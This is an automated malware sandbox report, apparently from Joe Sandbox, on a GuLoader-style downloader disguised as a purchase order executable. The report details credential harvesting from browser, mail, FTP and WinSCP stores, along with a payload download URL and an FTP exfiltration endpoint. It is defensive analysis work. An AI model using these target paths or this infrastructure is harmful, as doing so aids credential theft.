            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            331
            Security Software Discovery
            Remote Services1
            Email Collection
            Exfiltration Over Other Network Medium21
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            Boot or Logon Initialization Scripts111
            Process Injection
            251
            Virtualization/Sandbox Evasion
            1
            Credentials in Registry
            1
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            DLL Side-Loading
            1
            Access Token Manipulation
            Security Account Manager251
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Data from Local System
            Automated Exfiltration2
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer113
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            DLL Side-Loading
            Cached Domain Credentials117
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 624323 Sample: PO#4200000866.exe Startdate: 11/05/2022 Architecture: WINDOWS Score: 100 26 finseb.com 2->26 28 www.finseb.com 2->28 30 2 other IPs or domains 2->30 34 Found malware configuration 2->34 36 Antivirus detection for URL or domain 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 5 other signatures 2->40 8 PO#4200000866.exe 29 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 22 C:\Users\user\AppData\Local\...\library.dll, PE32 8->22 dropped 24 C:\Users\user\...\DeviceServicePlugin.dll, PE32+ 8->24 dropped 42 Writes to foreign memory regions 8->42 44 Tries to detect Any.run 8->44 12 CasPol.exe 15 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 32 finseb.com 131.226.4.8, 443, 49760, 49761 UNASSIGNED United States 12->32 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 2 other signatures 12->56 18 conhost.exe 12->18         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PO#4200000866.exe10%VirustotalBrowse
            PO#4200000866.exe5%ReversingLabsWin32.Downloader.GuLoader
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\library.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\library.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            solucionest.com.ar0%VirustotalBrowse
            www.finseb.com0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            ftp://ftp.solucionest.com.ar/log2100%Avira URL Cloudmalware
            http://subca.ocsp-certum.com050%Avira URL Cloudsafe
            http://subca.ocsp-certum.com020%Avira URL Cloudsafe
            http://subca.ocsp-certum.com010%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            https://www.finseb.com/qwer/COrg_ZBOJvB194.bin0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            http://pXfISF.com0%Avira URL Cloudsafe
            https://www.finseb.com/X0%Avira URL Cloudsafe
            http://EQDgdAvRkA6D7Crd.com0%Avira URL Cloudsafe
            http://finseb.com/qwer/COrg_ZBOJvB194.bin0%Avira URL Cloudsafe
            https://www.finseb.com/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            solucionest.com.ar
            192.185.112.181
            truefalseunknown
            finseb.com
            131.226.4.8
            truetrue
              unknown
              ftp.solucionest.com.ar
              unknown
              unknownfalse
                unknown
                www.finseb.com
                unknown
                unknownfalseunknown
                NameMaliciousAntivirus DetectionReputation
                https://www.finseb.com/qwer/COrg_ZBOJvB194.binfalse
                • Avira URL Cloud: safe
                unknown
                http://finseb.com/qwer/COrg_ZBOJvB194.bintrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.asus.com/campaign/aura/global/download.phpPO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.drfalse
                  high
                  http://127.0.0.1:HTTP/1.1CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://crl.certum.pl/ctsca2021.crl0oPO#4200000866.exefalse
                    high
                    http://repository.certum.pl/ctnca.cer09PO#4200000866.exefalse
                      high
                      http://repository.certum.pl/ctsca2021.cer0PO#4200000866.exefalse
                        high
                        ftp://ftp.solucionest.com.ar/log2CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://crl.certum.pl/ctnca.crl0kPO#4200000866.exefalse
                          high
                          http://subca.ocsp-certum.com05PO#4200000866.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://subca.ocsp-certum.com02PO#4200000866.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://subca.ocsp-certum.com01PO#4200000866.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.certum.pl/ctnca2.crl0lPO#4200000866.exefalse
                            high
                            http://repository.certum.pl/ctnca2.cer09PO#4200000866.exefalse
                              high
                              http://pXfISF.comCasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.finseb.com/XCasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://EQDgdAvRkA6D7Crd.comCasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.42144931318.000000001C661000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://nsis.sf.net/NSIS_ErrorErrorPO#4200000866.exefalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.iso.org/iso/country_codesPO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, iso_3166.xml.1.drfalse
                                    high
                                    http://www.certum.pl/CPS0PO#4200000866.exefalse
                                      high
                                      https://www.finseb.com/CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      131.226.4.8
                                      finseb.comUnited States
                                      16797UNASSIGNEDtrue
                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:624323
                                      Start date and time: 11/05/202214:48:592022-05-11 14:48:59 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 13m 53s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:PO#4200000866.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected Instruction Hammering
                                      Number of analysed new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@6/12@4/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 20.3% (good quality ratio 20%)
                                      • Quality average: 88.6%
                                      • Quality standard deviation: 21.7%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 112
                                      • Number of non-executed functions: 127
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      TimeTypeDescription
                                      14:51:35API Interceptor2684x Sleep call for process: CasPol.exe modified
                                      No context
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      UNASSIGNEDtrynagetmybinsufucker98575.armGet hashmaliciousBrowse
                                      • 192.81.70.97
                                      3eTveZH2TIGet hashmaliciousBrowse
                                      • 146.131.7.250
                                      g7eTVWVW6EGet hashmaliciousBrowse
                                      • 187.44.116.254
                                      qbG0s1MD7IGet hashmaliciousBrowse
                                      • 156.134.188.76
                                      67X3O360CAGet hashmaliciousBrowse
                                      • 156.134.188.17
                                      armGet hashmaliciousBrowse
                                      • 156.72.188.92
                                      b6YSeNoCTZGet hashmaliciousBrowse
                                      • 146.131.223.171
                                      Ibt1CP1pqoGet hashmaliciousBrowse
                                      • 156.134.164.53
                                      k374aQPv6sGet hashmaliciousBrowse
                                      • 206.67.215.195
                                      7g5SmEJaZ7Get hashmaliciousBrowse
                                      • 156.134.164.88
                                      MEgW3GiWtxGet hashmaliciousBrowse
                                      • 156.134.164.95
                                      oSQMUXhyx3Get hashmaliciousBrowse
                                      • 146.131.223.139
                                      8mX8Q4B9RoGet hashmaliciousBrowse
                                      • 142.152.247.180
                                      meerkat.x86Get hashmaliciousBrowse
                                      • 144.74.225.179
                                      gWZgayhCXhGet hashmaliciousBrowse
                                      • 156.134.176.87
                                      t1d9nRJZkWGet hashmaliciousBrowse
                                      • 50.93.132.69
                                      RDv1U6qUU6Get hashmaliciousBrowse
                                      • 156.72.164.5
                                      jPCGXjncX0Get hashmaliciousBrowse
                                      • 156.134.188.13
                                      w263ceEU3SGet hashmaliciousBrowse
                                      • 144.74.225.117
                                      I1jUIOc9ywGet hashmaliciousBrowse
                                      • 212.121.37.203
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      37f463bf4616ecd445d4a1937da06e19https://powerbi0522.web.app/B3xristinaa2Xpanaa1Htr4PwY5Wrtransita2XB3xr4Pa2XukGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      https://powerbi0522.web.app/B3xristinaa2Xpanaa1Htr4PwY5Wrtransita2XB3xr4Pa2XukGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      Transferencia.exeGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      file.htmlGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      https://dussetiere-my.sharepoint.com/:b:/g/personal/i_montembault_dussetiere_fr/EabJLR5faDlMiosfmmsmiNsBt4adMF4wiMBpWPTQgfgK1wGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      SecuriteInfo.com.Variant.Zusy.423667.18777.exeGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      SecuriteInfo.com.Variant.Zusy.423667.1117.exeGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      SecuriteInfo.com.Variant.Zusy.423667.20128.exeGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      message_zdm.htmlGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      http://nhcltd.ga/Get hashmaliciousBrowse
                                      • 131.226.4.8
                                      Chrome.Quick.Update.ver.102.71.50601.jsGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      Chrome.Quick.Update.ver.102.71.50601.jsGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      https://firebasestorage.googleapis.com/v0/b/linkdv-c935e.appspot.com/o/update%2Fupdate%2FWebmail.htm?alt=media&token=fe229210-99b3-4a8f-ab3f-0b7b3368dbe1#domain-admin@qualys.comGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      https://click.smartsheet.com/f/a/FM1AG-y6GySZep-2sm6riw~~/AARF7wA~/RgRkXZU0P0QtaHR0cHM6Ly9leHByZXNzLmFkb2JlLmNvbS9wYWdlL0doMUdkaVFUcUNxdVQvVwNzcGNCCmJxNBB7Yntk0tpSFXB1cmNoYXNpbmdAbXJsLmNvbS5hdVgEAAAAAA~~Get hashmaliciousBrowse
                                      • 131.226.4.8
                                      ST10-COR4737-andrea.carranza@cdiglaw.com_Fax.htmGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      vCHryYfSnV.exeGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      nhaaF2MnNA.docxGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      WAV20009-10.htmlGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      https://app.qpointsurvey.com/s/6mlvq9fdyzznrx8wGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      MTT0001450001.msiGet hashmaliciousBrowse
                                      • 131.226.4.8
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\user\AppData\Local\Temp\library.dllPO#4200000866.exeGet hashmaliciousBrowse
                                        s9kIU8A6sJ.exeGet hashmaliciousBrowse
                                          C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dllPO#4200000866.exeGet hashmaliciousBrowse
                                            C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dllPO#4200000866.exeGet hashmaliciousBrowse
                                              Transferencia.exeGet hashmaliciousBrowse
                                                Transferencia.exeGet hashmaliciousBrowse
                                                  EPAYMENT.exeGet hashmaliciousBrowse
                                                    EPAYMENT.exeGet hashmaliciousBrowse
                                                      xcVh7ZmH4Y.exeGet hashmaliciousBrowse
                                                        OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
                                                          xcVh7ZmH4Y.exeGet hashmaliciousBrowse
                                                            3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                                                              3GJ6S3Kwnb.exeGet hashmaliciousBrowse
                                                                file.exeGet hashmaliciousBrowse
                                                                  file.exeGet hashmaliciousBrowse
                                                                    Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                                                                      Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                                                                        7RsSycKaNc.exeGet hashmaliciousBrowse
                                                                          7RsSycKaNc.exeGet hashmaliciousBrowse
                                                                            potwierdzenie wplaty.exeGet hashmaliciousBrowse
                                                                              potwierdzenie wplaty.exeGet hashmaliciousBrowse
                                                                                Docs advice copy.exeGet hashmaliciousBrowse
                                                                                  Docs advice copy.exeGet hashmaliciousBrowse
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):202472
                                                                                    Entropy (8bit):6.000052926475626
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:GoFZlM8vbzCukOsa+tGuHBUXph7RZuUq+tZflXOdc+KTq6ZPGiHIxY4am/Vle2gL:GofuMbWukLdYuHBUX9Tcle2gyI
                                                                                    MD5:78B266FFCEA0C7FFDF364EFB4D61F623
                                                                                    SHA1:ADB3B29F96E70A60969F3CA4896372F303FAC264
                                                                                    SHA-256:647BDB2E881AEDB7FB350FB20BE46555F4B8156EC2A7757DC2FA43EA92A2BBB9
                                                                                    SHA-512:065F019A570ADED1E21BA9564CA51A1C974FD113663F9CF69AE4BE1472CFDD9649AFEDB65689FD20E6236EA5B58B0B7F3FE764C57540D5FE05E22EFD4026979F
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: PO#4200000866.exe, Detection: malicious, Browse
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S..2.2.2.Js..2..Z.2..Z.2..Z.2..Z.2.&[.2..[.2..Z.2..Z.2.2.k2..[.2..[.2..[...2.2w..2..[.2.Rich.2.........PE..d....5.a.........." .........................................................@............`.........................................0...X.......T.... ..p.......8............0..$... g..p....................h..(....g...............................................text............................... ..`.rdata..:...........................@..@.data...............................@....pdata..8...........................@..@.rsrc...p.... ......................@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):25002
                                                                                    Entropy (8bit):7.991900167248316
                                                                                    Encrypted:true
                                                                                    SSDEEP:768:Ux8/kU33emF41RQTsWfIZVKJrS+oAZPN1ZE:jOmu4AquVkLZPN1ZE
                                                                                    MD5:ADDF085CA091DB730D3B31F40AB8BE09
                                                                                    SHA1:8DBF909A5622DA49EAD2DB877D4CF34C2AB4C708
                                                                                    SHA-256:3AF396E6C7AA54E6D8AB991196B413EB84363DF7A75DF52474A7DB65CCDF7198
                                                                                    SHA-512:BE490EBAA09F7E4781F96E162F0DED2E3ADFB682B8E08AC888D0DE78578878B077085A03E6CDBE87C15523AB245F92F272262BEB57304C5C728A657BC7590174
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:....l...+Zp"!.\.z.|.f|.o......".x=.&B@...O..U.ad.6....:P....]....E.n......<..e..=....#DCD...=K.h.`....|...:7..m..oy....8vU.....Q.R..}.1...E..J_....i.5p.4.2tYF.l<.A.lt7Z....>..^J...&.z.'.x.....F....h..p....\0..y....v....G[."?..?UPv]..c...0........D.s......).3.....C...2...,,..-.9. y.......0;E.,..bTr4^...(........o.8.i.3...8m..=..A.y.t&s.H.1:..J.U..-.@.{..a.:..4..^;.+.P.....q...$@.^.[.......4...Mx...tH..................R..A.:..Go+[F......{......Ei..k.[....G...0.?4N...Kgg`.....G\..........^..+T......U...3.n.....Lz..vQ4......2{b.....Y.i..:.......F...f...!.n.8.|......V\6..df....\%%.....1..F.0t.d.L.+....E...5....^...qV...9h....X.#.=.[....:.'....qsQ..7......[.G..j...8nK.Ep?;W.....j(.Ln.xU."..M..O..SY.<.o@..S...."Y....`Zc..Yrd.....'.v..b,.......ka..w!T..Q.}p..P#*..z...4..Bgp..+`.*..3wW...d."......0H....ra.u95.I..4`.....I..Lt!.B.>(.YkQ."$...p^.\H.'.......K9D.I.q..>n..._...........+%....<..3n$....H.d.}.".....L).c..b...8.'I..(...T
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):87438
                                                                                    Entropy (8bit):6.436902007549056
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:omUT7ai9UNcEshv2cA4CAD4bSv0tgxhnriGFyHuvYIpf:oZuiwcEQ2H49LhrZ7YI1
                                                                                    MD5:7E187F93F378A4AE3BD099E5A17AE036
                                                                                    SHA1:22B04988E767283FFB168FC95DC60446B79C1A31
                                                                                    SHA-256:11F2F67A97D28648FB806E7049026DC1FF4E74DC51A158831CEF6FA7AA4DB1F4
                                                                                    SHA-512:B63C1B128A2D1E14443E8F6349F809AFDF03C4004C2B07C394CA49A4496FBE32977C26FB65DA2B510A1F690056486A0111AE7C876F1480EE19F38954BA2B73D6
                                                                                    Malicious:false
                                                                                    Preview:..f.h....&..?A.............................................%..V...............................................4..JH..........................................................f...f......3.<j.wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwf.........f.......H(.)...............................................f.s.....u..a....5-.............................................................f...f.`..0...6............................................D............W..~.........................f!....f.r.#.i.....5..errrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr,.....g.f.s.l.)"Z.>WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWf....f.r.D........-.j..`````````````````````````````````````````f...f......g....h.f.d..7.U.......................................................4.f....c.....'...!\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\...........b...2E.m...............................................f!.....k.f.s.6......#.!Dr...............................f..f.a....e...f.c..5.8....................................
                                                                                    Process:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):290
                                                                                    Entropy (8bit):6.848704057450045
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:6v/lhPys1ZJmBXeD3e6gv7ksqwDkgrb2DezQq+lp:6v/7VZJwUuLNLvH2Pr
                                                                                    MD5:AFB944CEF06D0CE65E2CB6763EF2472D
                                                                                    SHA1:1D340D8BD9B52EDC71C6F06D6F31A9C8F4E566BF
                                                                                    SHA-256:CD6FB10C2F3455A8479455B59AB69C176322747AD857AC9C387A7B0C717A21BB
                                                                                    SHA-512:7BA8C6D91A068EA257DF44D6571FA9230E3167D0B73DAAA296ED1B94BE9C94CEC9B7C49F21FEE95BB1C06A40C4F5085451426D3863DE381B5E5CE975EC62EA40
                                                                                    Malicious:false
